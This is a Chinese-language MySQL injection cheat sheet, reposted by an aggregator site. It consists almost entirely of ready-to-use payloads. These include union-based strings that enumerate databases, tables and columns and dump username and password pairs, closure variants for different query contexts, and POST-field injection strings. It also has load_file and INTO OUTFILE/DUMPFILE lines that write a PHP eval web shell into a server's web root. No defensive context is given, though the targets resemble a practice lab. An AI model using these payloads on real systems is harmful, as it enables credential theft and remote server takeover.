Mysql注入笔记
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了Mysql注入笔记,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1335字,纯文字阅读大概需要2分钟。
内容图文
1.基于字符型报错注入
报字段数:
‘ order by 3 --+ // “+” 代表空格
‘ union select 1,2,3 --+
‘ UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA --+ // 获取数据库信息
‘ UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479 --+ // 获取表信息
‘ UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 0x7573657273 --+ // 获取表字段信息
‘ UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+ // 获取数据o
2.基于数字型报错注入
不需要使用 ‘ 进行闭合,直接利用,利用方法和字符型一样
3.字符型报错注入(带())
‘) order by 3--+ // 使用 )进行闭合
4.字符型报错注入(带")
") order by 3--+ //
5. 导入导出函数
select load_file(“C://TEST.txt”);
select "<?php eval($_POST[‘chybeta‘])?>" into outfile ‘C:/phpstudy/WWW/test/webshell.php‘;
select "<?php eval($_POST[‘chybeta‘])?>" dumpfile ‘C:/phpstudy/WWW/test/webshell.php‘;
6.POST类型注入
uname=admin‘#&passwd=chybeta&submit=Submit
uname=admin”#&passwd=chybeta&submit=Submit
Mysql注入笔记
标签:sch 获取 信息 pst amp 导入导出 into file 需要
本文系统来源:http://www.cnblogs.com/seeker01/p/7988875.html
内容总结
以上是互联网集市为您收集整理的Mysql注入笔记全部内容,希望文章能够帮你解决Mysql注入笔记所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。